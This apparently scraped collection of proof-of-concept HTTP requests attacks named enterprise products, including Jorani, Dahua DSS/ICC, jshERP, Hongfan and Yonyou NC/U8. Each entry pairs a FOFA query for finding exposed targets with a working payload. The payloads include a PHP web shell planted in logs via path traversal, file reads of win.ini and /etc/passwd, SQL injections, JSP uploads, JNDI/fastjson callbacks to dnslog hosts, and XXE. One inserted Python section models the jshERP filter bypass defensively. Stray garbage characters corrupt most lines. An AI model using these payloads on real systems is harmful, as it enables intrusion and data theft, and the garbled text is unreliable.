3 K7 L% T6 S+ ]/ ]* y: Y9 `/ qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
% e# H6 k% P% \, k& v7 fConnection: close$ `6 D4 @# ~9 v) _
Content-Length: 252
' s5 |5 U) y! G2 HContent-Type: application/x-www-form-urlencoded
0 K1 a1 _3 C0 uCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r+ O. @. V( \$ P
Accept-Encoding: gzip
% E1 E. ^$ A, W$ M3 n- ]6 i$ r4 o( t3 o& D! L0 q; P/ b8 I
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
! Q5 {" i! m& k) K' E) z4 I
; Z& t1 S$ N D: d* s- f p6 n1 M! M: I, y7 L/ z6 _
; B4 V k& H/ _$ X K8 G) X: T向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
6 l$ Q9 ^% p$ GGET /pages/view/log-2023-10-24 HTTP/1.1. r$ A7 H* n5 A) [
Host: 192.168.190.30$ u" U5 p+ H) c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! T& y. u- p: H$ Z- E. f0 u; cConnection: close
, d, v9 J( c1 i! Y9 N+ ECookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
7 ^% G K9 g e( v( g( A' a% W3 OK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=# b2 X% B# |4 ~ P
X-REQUESTED-WITH: XMLHttpRequest4 h2 J/ L, B, ^6 @+ B
Accept-Encoding: gzip& j) r5 I4 C# q- P2 f
' P: D0 S5 A# x( `' {/ ^
9 d3 v4 E, Q/ ^0 G' F/ n+ ]1 n) Z6 N13. 红帆iOffice ioFileDown任意文件读取
; n: i- f, h7 H5 FFOFA:app="红帆-ioffice"7 u: J, e' O! v0 z& s, ~% E
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.11 f4 J3 g! ~6 k- q6 S
Host: x.x.x.x: g, K0 Q9 O+ U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36. K+ ~# d0 X/ h" H
Connection: close. S! A1 f9 j, x$ x. v$ t
Accept: */*
/ U# U) f' s) B3 g b' i. bAccept-Encoding: gzip$ h7 i; W9 m7 D( v& q
. } f6 z! u2 q. x$ z: O8 y. ^' B' b) K4 p
14. 华夏ERP(jshERP)敏感信息泄露7 h t5 q& M+ F2 U+ i
FOFA:body="jshERP-boot", T+ j' l& U. f3 r# Z
泄露内容包括用户名密码
2 T y t8 `+ u7 J$ G7 ?! UGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
) F" p, ?+ U8 N0 IHost: x.x.x.x7 C& k1 A7 T8 R/ g. o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
: I3 o6 y" n& `4 G4 qConnection: close
% e( h4 Y) g2 l, D1 t; EAccept: */*
' K. b; |! r' a8 |3 mAccept-Language: en
% Q u) t, W' xAccept-Encoding: gzip1 A/ W, l* u! s4 Q3 p
1 M1 J) O' T. P0 V
, Z5 Y- d6 r. r9 W15. 华夏ERP getAllList信息泄露
1 J/ J8 B8 U: D/ S2 a8 ~0 BCVE-2024-0490
- Q' a9 V" e H+ D6 dFOFA:body="jshERP-boot"; O7 r3 _. K8 l
泄露内容包括用户名密码
3 Z, j! ] D8 i0 y4 k6 y# `* K. PGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
+ L0 D6 r t7 d3 IHost: 192.168.40.130:100
( ` L3 }. C8 v9 \5 D+ uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.360 c. o4 l1 p' C: Y7 b! N: L" b
Connection: close; S: P! S' x5 X' j1 a/ d" F
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8) x* {1 F6 ?% M% z4 c4 z5 |
Accept-Language: en
6 F: @8 X8 F' ~ t# r5 Vsec-ch-ua-platform: Windows! D( C) Q& w3 l/ @$ W6 v7 C7 k
Accept-Encoding: gzip
$ Q5 ~7 d1 Q" x* i8 c) `; W1 V6 n" R
; g8 q7 f- W x5 t7 u* o& Q$ u
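Items 14 and 15 reach the same protected handler with two spellings, getAllList;.ico and a.ico/../getAllList. Both work against a login filter that decides on the raw request URI (for example by checking whether it contains a static-asset suffix) while the framework routes on a normalized path with matrix parameters and ".." removed. The Python below is an added example that models that mismatch; it is not jshERP's code, and the suffix list and the interceptor logic are assumptions of the example. The fix it shows is to make the access decision on the very same normalized path the servlet will dispatch, and to test its suffix rather than search for a substring.

```python
"""Why 'getAllList;.ico' and 'a.ico/../getAllList' (items 14 and 15) get past a login filter.

Added example; the interceptor below is a model of the weakness, not jshERP's code.
"""
from __future__ import annotations

import posixpath
from urllib.parse import unquote

# Assumed list of suffixes the filter treats as public static assets.
PUBLIC_SUFFIXES = (".ico", ".css", ".js", ".png")


def servlet_route(request_uri: str) -> str:
    """Path the framework dispatches on: query removed, ';matrix' suffix dropped
    from each segment, percent-decoding applied and '..' collapsed."""
    path = unquote(request_uri.partition("?")[0])
    path = "/".join(segment.split(";", 1)[0] for segment in path.split("/"))
    return posixpath.normpath(path)


def naive_is_public(request_uri: str) -> bool:
    """Whitelists static assets by substring on the raw URI (the weak pattern)."""
    return any(suffix in request_uri for suffix in PUBLIC_SUFFIXES)


def hardened_is_public(request_uri: str) -> bool:
    """Decide on the same normalized path the servlet will route, and only on its suffix."""
    return servlet_route(request_uri).endswith(PUBLIC_SUFFIXES)


def evaluate(request_uri: str, has_session: bool = False) -> dict[str, object]:
    """Report the routed path and whether each filter would let the request through."""
    return {
        "route": servlet_route(request_uri),
        "naive_allows": has_session or naive_is_public(request_uri),
        "hardened_allows": has_session or hardened_is_public(request_uri),
    }


if __name__ == "__main__":
    for uri in (
        "/jshERP-boot/user/getAllList",
        "/jshERP-boot/user/getAllList;.ico",
        "/jshERP-boot/user/a.ico/../getAllList",
        "/favicon.ico",
    ):
        print(uri, evaluate(uri))
```

Both PoC URIs normalize to /jshERP-boot/user/getAllList, which has no public suffix, so the hardened check denies them without a session while a genuine /favicon.ico still passes. Rejecting any URI that contains ".." or ";" outright is a cheap extra layer, but it is not a substitute for deciding on the normalized path.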
16. 红帆HFOffice医微云SQL注入
3 u ~ z9 ?& S% i7 v0 ]7 ZFOFA:title="HFOffice"" P: u( Q4 N9 f! r2 l
poc中调用函数计算1234的md5值
% h; z2 p6 i7 B% ]7 ~; fGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.13 Z/ e7 A% g7 m! X; V
Host: x.x.x.x
, |& @. V; u/ R, y9 \/ PUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
! E$ B' x0 |* ZConnection: close
- y! L5 n% M' [9 U# A6 jAccept: */*' A, T9 \) C0 N6 u9 Q! a
Accept-Language: en
7 ]# O& |4 J2 V1 K& rAccept-Encoding: gzip5 l8 P$ e" n1 \
3 i: b+ s1 w5 H: Z0 z2 Y
/ w) T. X7 J# }17. 大华 DSS itcBulletin SQL 注入4 S6 |! C. e2 N0 O: m% Z
FOFA:app="dahua-DSS". ?) I. H0 T, r( r2 f" o. R
POST /portal/services/itcBulletin?wsdl HTTP/1.17 B2 Y" a0 x0 I& d
Host: x.x.x.x
) N4 W9 @: L9 M. aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; m' \5 b8 v7 B; g4 |' m
Connection: close
r" W; _& ?, P/ r3 k; vContent-Length: 345
R3 F8 i9 D9 [9 ]+ y/ b( M# w; c Z. ^Accept-Encoding: gzip, x+ l0 v7 e- Z
( y1 y }5 c9 Y$ A3 f, k
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
0 ?4 u' S, _+ A7 K, f<s11:Body>
; W0 G0 W* u% S' v' r( \" V <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
, F ~# d& @2 n. g( b <netMarkings>) j7 L0 ]7 M T! v5 T" p
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
, z9 c b; v, k$ {- E3 } </netMarkings>
7 Y/ j0 C* l$ C% v </ns1:deleteBulletin>
( \" d$ D0 W! X0 h7 e F. K7 u+ \3 I </s11:Body>" R! l1 j( }8 u3 U+ K) C: {2 D
</s11:Envelope>
& N1 o; Q# _4 l- Q: Q+ A! r: o I7 ]0 r# N4 V
8 b3 \1 V0 f' ^) E% ^* T; t, R* b18. 大华 DSS 数字监控系统 user_edit.action 信息泄露( m6 `. g1 H1 g' c4 L6 n
FOFA:app="dahua-DSS"
. H, W9 Q7 Z7 B/ {) fGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
) Z+ F* v) ^# C2 @+ q7 }3 pHost: your-ip0 A5 v- I4 \( F8 i; K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 c! Q1 c) Z( \* A7 GAccept-Encoding: gzip, deflate
5 e, O) y: ?8 B9 n- L M) YAccept: */*2 q+ t; Z, C4 C7 y
Connection: keep-alive
% _6 J9 B2 \5 l. L7 L3 A, L
7 X- q- p' m3 F: {; S9 ?
; }* Q! L) r: I- X. ~) p) }
0 R1 L$ Z' o3 y9 h19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入. d* L9 L5 y* X3 s
FOFA:app="dahua-DSS"
& X; ^9 k5 \( p* Y& c: Y2 K+ e' zGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1. F/ t/ y) ]' E: J
Host:7 n8 s: L# }$ K, Z
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36' A5 {, R. S, c* j1 ^
Accept-Encoding: gzip, deflate+ s2 g, T$ | C# ? W4 J/ i% U
Accept: */*$ D6 u% ~0 q$ q; f
Connection: keep-alive
' N! P$ M7 w$ V6 N1 _* o) l9 L
& D, i$ I M$ m6 I5 @# H7 h L" s+ e% n; @( m5 k3 q
20. 大华ICC智能物联综合管理平台任意文件读取
5 m5 f5 s0 z6 a+ f8 l* H3 vFOFA:body="*客户端会小于800*"6 P6 U, v! h" S! L, T
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
; O6 N9 u+ h- d) JHost: x.x.x.x
4 v/ ~4 S/ Y5 u, r( }/ o2 z2 \) [User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 A; j2 _! A' O, n0 N N( YConnection: close5 I7 F/ F& Z* g$ Q) K' i; o
Accept: */*
# Z7 j- P$ {+ T5 Y& Q: pAccept-Language: en
5 r2 o1 e' S: b6 G1 M, \Accept-Encoding: gzip9 x$ P7 h+ ^1 @" S/ C
6 U9 f' S6 N# j; V1 D: G% b9 G$ P z1 m! ~: I
21. 大华ICC智能物联综合管理平台random远程代码执行' }, i7 p* e- f+ {# T
FOFA:icon_hash="-1935899595"
/ }- J& X6 [- V LPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
! a" c& g T* {; T% z! U5 g* eHost: x.x.x.x; h; ~9 W1 C( J- H9 j7 w+ B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ ]- q; c! R b" b, NContent-Length: 161
7 n& @9 A6 E2 Q- t0 u* @Accept-Encoding: gzip
- Q; ^0 ?' [) y3 l( }3 g. X- WConnection: close
5 P5 s; f. B/ f. u% ?6 o: eContent-Type: application/json;charset=utf-8* j# W6 H2 J8 x5 c- ?' K' {
; t* y( D' C) l8 }
{3 |% ?# Z% z: b. a- o0 w9 Z% ~5 _& [2 }
"a":{3 k, t1 H5 R3 N. u0 J0 L1 [
"@type":"com.alibaba.fastjson.JSONObject",
# x: y7 I' q9 x! O {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
2 B* G4 t; A8 r! k/ M }""
* }4 x$ d# `$ S5 H- w}* {) k& i8 b8 `6 q" d
. @" j$ @- ~5 B \; [1 K3 s" B; T% b/ Q7 y4 z4 e! U. Z
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
1 A8 c$ \0 c2 E# J" v% F+ i7 eFOFA:icon_hash="-1935899595"" }" B: e5 J( A4 g$ z( l# h2 C
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
v8 ?5 B9 r1 Z5 y4 t! AHost: your-ip5 T0 k/ ^2 |# B0 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 y+ b) z O8 ?. dContent-Type: application/json;charset=utf-8
{* V7 K0 ~2 I' p K9 Q2 b. r- _ Q, Q0 |$ p: H
{: z1 g9 s. I; b- h
"loginName":"${jndi:ldap://dnslog}"
" ~- T, V3 r. S/ ?, }9 U}
3 e. U3 @: t- K/ w1 q" P5 m% s- }. t: I$ \9 w; w% z P
1 W. m$ I5 d" Z1 P( \6 z# |: S# T" o/ A2 F! `0 K" R, r
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
$ _" w: S! d8 a eFOFA:icon_hash="-1935899595"5 `7 c, N- K) ^& D) w( b6 }- \; a
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
( @$ \' B/ \9 k) G9 S h* fHost: your-ip
2 M! l3 [' F& `6 @4 R. c+ E4 d5 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 R0 [6 k3 [4 s4 P; k l6 q) NContent-Type: application/json;charset=utf-8+ N/ W$ t W! F. [
Accept-Encoding: gzip
8 X$ ]9 S$ N2 k5 j' I# u) Y+ v( q2 ^2 |Connection: close( {& d+ d, l5 I+ W9 D6 w. C2 |
+ R( b; [6 g4 C% ^; m3 W
{ M1 @1 }5 I3 u% d. r
"a":{
8 X& \# i2 o, y3 c "@type":"com.alibaba.fastjson.JSONObject",
1 o: M2 ~! }7 s/ ?. T) W {"@type":"java.net.URL","val":"http://DNSLOG"}
+ M) G' u3 }. h% f4 q/ m }""1 U" P0 g2 { L7 [. J" w
}1 l5 j; K8 H! s- c1 Q9 J
5 W: q6 }* K5 g. V6 Y) A! X: n! V9 ~
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
  <soapenv:Header/>
  <soapenv:Body>
    <iup:getResult>
      <!--type: string-->
      <iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
    </iup:getResult>
  </soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

